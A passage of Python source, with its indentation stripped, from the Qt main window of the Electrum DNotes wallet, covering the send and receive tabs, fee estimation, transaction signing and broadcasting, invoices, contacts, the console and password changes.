if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.invoice_e = MyLineEdit()
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a DNotes address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a DNotes address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Invoice number (not mandatory).') + '\n\n'\
+ _('The invoice is a user defined identifier that gets stored in the blockchain with the transaction.')
invoice_label = HelpLabel(_('Invoice'), msg)
grid.addWidget(invoice_label, 3, 0)
grid.addWidget(self.invoice_e, 3, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 5, 0)
grid.addWidget(self.amount_e, 5, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 5, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 5, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 5, 4)
msg = _('DNotes transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
#TODO: should find out the root cause of why feerate_e can be None here, but for now added this
if not hasattr(self,'feerate_e'):
return
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum DNotes tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
#grid.addLayout(vbox_feelabel, 6, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
#grid.addLayout(vbox_feecontrol, 6, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount, '')] #null invoice for now
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate:
displayed_feerate = displayed_feerate // 1000
else:
# fallback to actual fee
displayed_feerate = fee // size if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = displayed_feerate * size if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(feerounding)
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(bool(feerounding))
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount, invoice in outputs:
if addr is None:
self.show_error(_('DNotes Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid DNotes Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
#if fee > confirm_rate * tx.estimated_size() / 1000:
#msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def lock_invoice(self, b):
self.invoice_e.setFrozen(b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e, self.invoice_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid DNotes URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.invoice_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_dnotes.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
